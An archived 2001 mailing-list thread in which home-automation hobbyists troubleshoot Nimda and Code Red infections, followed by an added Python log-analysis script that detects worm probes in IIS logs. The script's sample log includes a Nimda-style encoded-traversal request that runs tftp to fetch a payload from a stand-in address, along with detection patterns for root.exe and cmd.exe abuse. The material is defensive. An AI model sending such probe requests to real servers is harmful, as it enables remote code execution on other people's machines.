RE: Re: Virus
- To: <ukha_d@xxxxxxx>
- Subject: RE: Re: Virus
- From: "Brian G. Reynolds" <brian.g.reynolds@xxxxxxx>
- Date: Sun, 23 Sep 2001 12:03:31 +0100
- Delivered-to: mailing list ukha_d@xxxxxxx
- Mailing-list: list ukha_d@xxxxxxx; contact ukha_d-owner@xxxxxxx
- Reply-to: ukha_d@xxxxxxx
It seems I have not got rid of this virus as my checker is still reporting
its presence!
It says there are more *.eml's but if I do a search I cannot find any!
I would be grateful for any assistance please,
TIA,
B.
> -----Original Message-----
> From: John McManus [mailto:john.mcmanus@xxxxxxx]
> Sent: 23 September 2001 11:27
> To: ukha_d@xxxxxxx
> Subject: Re: [ukha_d] Re: Virus
>
>
> Having poked into things a bit more...
>
> Looked at the IIS log files on the server (w2k), I saw dodgy URLs being
> entered for my site. These then invoked root.exe (which had been left over
> from a sadm virus that was not totally cleaned). A couple of seconds after
> the external computer tried to fire up the IIS page, TFTP was invoked to the
> same address as the external browser (this was blocked by the firewall).
>
> Went to the Microsoft site & downloaded the 'coderedcleanup.exe' which
> removed the dodgy root.exe and tidied up a couple of other IIS things.
>
> Everything seems to be fine... for the moment!
>
> Lessons learnt:
> It is valuable to have defence in depth - firewalls, virus guards, log files
> for review.
> Backups are useful... but can be tricky to use if you are not sure when
> exactly you were infected with the virus.
> If you are running IIS, it pays to review your log files regularly.
> hotfixchecker from Microsoft is useful to ensure you have all the
> appropriate patches.
> The time lost to virus attacks / fixes is a real PITA in a domestic
> environment.
>
> ----- Original Message -----
> From: <steve@xxxxxxx>
> To: <ukha_d@xxxxxxx>
> Sent: Sunday, September 23, 2001 10:43 AM
> Subject: [ukha_d] Re: Virus
>
>
> > If you are in win2k just look in taskman and see if anything unusual
> > is running.
> > If there is strange stuff happening, end task it, then find it in your
> > computer and delete it.
> >
> > If you're on win98/95 and I think ME,
> > you can't see "all" running processes, so I have a neat little utility
> > somewhere I made in VB which allows you to list ALL running processes
> > and kill any of them. I think if I can find it, I will add a kill
> > and delete button as well, or a kill and move button.
> >
> > interested?
> >
> > HTH steve
> > --- In ukha_d@y..., "John McManus" <john.mcmanus@b...> wrote:
> > > I am in a difficult position as my virus scanner (NAV2001) does not show
> > > that I am infected, but the Zone Alarm Pro firewall suddenly (Wednesday)
> > > started asking if I want to allow TFTP (trivial file transfer protocol) to
> > > connect to the internet. I have also run a couple of the 'cleaner' programs
> > > for Nimda virus... they too say I am not infected.
> > >
> > > Since I am not aware of any apps on the server that need to use TFTP (and
> > > the addresses that it is going to are other BT Internet ones), I guess I
> > > need to assume that I am infected with something and reformat /
> > > re-install... a real PITA.
> > >
> > > Any thoughts would be appreciated.
> > > ----- Original Message -----
> > > From: "Brian G. Reynolds" <brian.g.reynolds@n...>
> > > To: <ukha_d@y...>
> > > Sent: Saturday, September 22, 2001 7:42 PM
> > > Subject: RE: [ukha_d] Virus
> > >
> > >
> > > > Thanks Keith,
> > > >
> > > > I am using Norton AntiVirus 2001 recently bought, I used its own virus
> > > > scan routine, is there a better way?
> > > >
> > > > All the infected files were deleted.
> > > > I do use its auto update and do it manually as well.
> > > >
> > > > Thanks for the info.
> > > >
> > > > B.
> > > > > -----Original Message-----
> > > > > From: Keith Doxey [mailto:ukha@xxxxxxx...]
> > > > > Sent: 22 September 2001 19:00
> > > > > To: ukha_d@y...
> > > > > Subject: RE: [ukha_d] Virus
> > > > >
> > > > >
> > > > > That's probably it.
> > > > >
> > > > > How did you run your virus scan?
> > > > > We ran it with Windows "Find Files" containing the text "whatever you
> > > > > care to put" so that it was forced to open every file on the machine,
> > > > > at which time the AV software should find the infected files.
> > > > >
> > > > > Make sure you keep your anti virus software up to date.
> > > > >
> > > > > At work we use VirusScan TC from McAfee.
> > > > > The Dat file was at version 4158 at the beginning of the week and by
> > > > > yesterday had reached 4162.
> > > > >
> > > > > At home I use eTrust EZ Antivirus. Its Dat file has gone from 1491 on
> > > > > Monday to 1512 yesterday.
> > > > >
> > > > > One of the worst things about Nimda is that YOU don't have to do
> > > > > anything to catch it. I have no doubt that there will be several more
> > > > > viruses that mimic the HTML method employed by Nimda, namely using
> > > > > Javascript to pop up a window at coordinates that won't show on the
> > > > > screen and then try to do malicious things to your machine. Disabling
> > > > > Javascript would stop that but would also stop many reputable web pages
> > > > > from working and I believe most, if not all, eCommerce sites would be
> > > > > less than useless if you didn't support Javascript.
> > > > >
> > > > > Once again a few idiots spoiling things for the majority :-(
> > > > >
> > > > > Keith
> > > > >
> > > > > > -----Original Message-----
> > > > > > From: Brian G. Reynolds [mailto:brian.g.reynolds@xxxxxxx...]
> > > > > > Sent: 22 September 2001 15:33
> > > > > > To: ukha_d@y...
> > > > > > Subject: RE: [ukha_d] Virus
> > > > > >
> > > > > >
> > > > > > Thanks Keith, I should have known that :-(
> > > > > >
> > > > > > All .eml deleted.
> > > > > >
> > > > > > I have run the virus scan again and it does not find any more,
> > > > > > does that mean all is ok again?
> > > > > > Never had a virus before, not sure when to trust it again!
> > > > > >
> > > > > > I have already read the threads, I have re-SP2'd and another MS patch
> > > > > > q301625_w2k_sp3_x86_en.exe
> > > > > > Anything else or can I now breathe again!!
> > > > > >
> > > > > > Thanks,
> > > > > >
> > > > > > B.
> > > > > >
> > > > > > > -----Original Message-----
> > > > > > > From: Keith Doxey [mailto:ukha@xxxxxxx...]
> > > > > > > Sent: 22 September 2001 15:07
> > > > > > > To: ukha_d@y...
> > > > > > > Subject: RE: [ukha_d] Virus
> > > > > > >
> > > > > > >
> > > > > > > *.eml are email messages but the ones that you have found will be
> > > > > > > loads with the same file size and datestamp.
> > > > > > >
> > > > > > > THEY ARE INFECTED WITH THE VIRUS ..... DELETE THEM.
> > > > > > >
> > > > > > > It also puts some code in any HTML or ASP files it finds that will
> > > > > > > infect any other PC viewing the pages.
> > > > > > >
> > > > > > > Read the previous threads from when Graham was battling to remove
> > > > > > > Nimda.
> > > > > > >
> > > > > > > Keith
> > > > > > >
> > > > > > > > -----Original Message-----
> > > > > > > > From: Brian G. Reynolds [mailto:brian.g.reynolds@xxxxxxx...]
> > > > > > > > Sent: 22 September 2001 14:04
> > > > > > > > To: UKHA Group
> > > > > > > > Subject: [ukha_d] Virus
> > > > > > > >
> > > > > > > >
> > > > > > > > What are .eml files?
> > > > > > > > I assume something to do with the web/html/IE?
> > > > > > > > It seems that these were the most attacked, I have "quarantined"
> > > > > > > > them but not sure if I can delete them?
> > > > > > > >
> > > > > > > > Another PC has also been infected but this time it seems mostly
> > > > > > > > Psion files so I have deleted them! subtle.
> > > > > > > >
> > > > > > > > Thanks,
> > > > > > > >
> > > > > > > > B.
> > > > > > > >
> > > > > > > >
> > > > > > > >
> > > > > > > > For more information: http://www.automatedhome.co.uk
> > > > > > > > Post message: ukha_d@y...
> > > > > > > > Subscribe: ukha_d-subscribe@y...
> > > > > > > > Unsubscribe: ukha_d-unsubscribe@y...
> > > > > > > > List owner: ukha_d-owner@y...
> > > > > > > >
> > > > > > > > Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/
> > > > > > >
> > > > > > >
> > > > > > >
>
>
For more information: http://www.automatedhome.co.uk
Post message: ukha_d@xxxxxxx
Subscribe: ukha_d-subscribe@xxxxxxx
Unsubscribe: ukha_d-unsubscribe@xxxxxxx
List owner: ukha_d-owner@xxxxxxx
Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/
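The pattern John describes in his reply (probe URLs in the IIS log invoking root.exe, then outbound TFTP to the same address a couple of seconds later) can be hunted for mechanically rather than by eye. The script below is an added example written for this page, not code from the thread or from any of the posters: it parses constructed IIS W3C extended log lines, flags requests that target root.exe or cmd.exe, carry the Unicode or double-encoded traversal sequences Nimda and Code Red II are known to have used, or ask the server to run tftp, and then correlates each hit with constructed firewall records of outbound TFTP (UDP/69) to the probing address within ten seconds. The firewall record layout, the IP addresses, the ten-second window and every log line are assumptions made for the example; the firewall format is not ZoneAlarm's.

```python
"""Added example, not from the original thread: scan IIS W3C extended log
lines for the kind of probe URL John describes (requests that invoke root.exe
or cmd.exe, including the Unicode and double-encoded traversal forms Nimda is
known to use) and correlate each hit with firewall records of outbound TFTP to
the same remote address a few seconds later. Both logs below are constructed
samples; the firewall format is invented for the example, not ZoneAlarm's."""
import re
from datetime import datetime, timedelta
from urllib.parse import unquote

# Executables Nimda and Code Red II probed for, and the encoded traversal
# sequences they used to reach cmd.exe through /scripts or /_vti_bin.
PROBE_RE = re.compile(r"root\.exe|cmd\.exe", re.IGNORECASE)
ENCODED_TRAVERSAL_RE = re.compile(
    r"\.\.(?:%c0%af|%c1%1c|%c1%9c|%255c|%252f|%5c)", re.IGNORECASE)

# Constructed IIS 5 log: the #Fields directive names the columns.
IIS_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-09-23 10:12:01 203.0.113.7 GET /index.htm - 200
2001-09-23 10:12:40 198.51.100.9 GET /scripts/root.exe /c+dir 200
2001-09-23 10:12:41 198.51.100.9 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+tftp%20-i%20198.51.100.9%20GET%20Admin.dll 200
2001-09-23 10:13:05 203.0.113.7 GET /images/logo.gif - 200
"""

# Constructed firewall records: date time direction proto src -> dst action
FIREWALL_LOG = """\
2001-09-23 10:12:43 OUT UDP 192.168.1.10:1035 -> 198.51.100.9:69 BLOCKED
2001-09-23 10:12:50 OUT UDP 192.168.1.10:1036 -> 203.0.113.7:69 BLOCKED
2001-09-23 10:13:10 OUT TCP 192.168.1.10:1037 -> 203.0.113.7:80 ALLOWED
"""


def parse_iis(text):
    """Parse W3C extended log lines into dicts keyed by the #Fields names."""
    fields, records = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line.strip() or line.startswith("#"):
            continue
        rec = dict(zip(fields, line.split()))
        rec["when"] = datetime.strptime(rec["date"] + " " + rec["time"],
                                        "%Y-%m-%d %H:%M:%S")
        records.append(rec)
    return records


def is_probe(uri_stem, uri_query):
    """True when the request targets root.exe/cmd.exe, carries an encoded
    traversal, or asks the target to run tftp (the worm's second stage)."""
    raw = uri_stem.lower()
    once = unquote(raw)       # %255c -> %5c
    twice = unquote(once)     # %5c   -> backslash
    if PROBE_RE.search(raw) or PROBE_RE.search(twice):
        return True
    if ENCODED_TRAVERSAL_RE.search(raw):
        return True
    if "../" in once or "..\\" in once or "../" in twice or "..\\" in twice:
        return True
    return "tftp" in unquote(uri_query).lower()


def find_probes(records):
    return [r for r in records if is_probe(r["cs-uri-stem"], r["cs-uri-query"])]


def parse_firewall(text):
    """Parse the constructed firewall format used above."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        date, time, direction, proto, _src, _arrow, dst, action = line.split()
        ip, port = dst.rsplit(":", 1)
        events.append({"when": datetime.strptime(date + " " + time, "%Y-%m-%d %H:%M:%S"),
                       "direction": direction, "proto": proto,
                       "dst_ip": ip, "dst_port": int(port), "action": action})
    return events


def correlate(probes, events, window=timedelta(seconds=10)):
    """Pair each probe with outbound TFTP (UDP/69) to the probing address
    that started within `window` after the request: the sequence John saw."""
    hits = []
    for p in probes:
        for e in events:
            if (e["direction"] == "OUT" and e["proto"] == "UDP" and e["dst_port"] == 69
                    and e["dst_ip"] == p["c-ip"]
                    and timedelta(0) <= e["when"] - p["when"] <= window):
                hits.append((p, e))
    return hits


if __name__ == "__main__":
    probes = find_probes(parse_iis(IIS_LOG))
    for p in probes:
        print("probe", p["when"], p["c-ip"], p["cs-uri-stem"], p["cs-uri-query"])
    for p, e in correlate(probes, parse_firewall(FIREWALL_LOG)):
        print("tftp ", e["when"], "->", e["dst_ip"], e["action"],
              "(%ds after probe)" % (e["when"] - p["when"]).seconds)
```

On a real server the IIS log lives under %SystemRoot%\system32\LogFiles\W3SVC1\ and the field list in the #Fields header varies with what logging was enabled, which is why the parser reads that header rather than assuming column positions. A probe that returns sc-status 200 against root.exe or cmd.exe, as in the two constructed lines above, means the command actually ran; a 404 means the file was not there and the attempt failed.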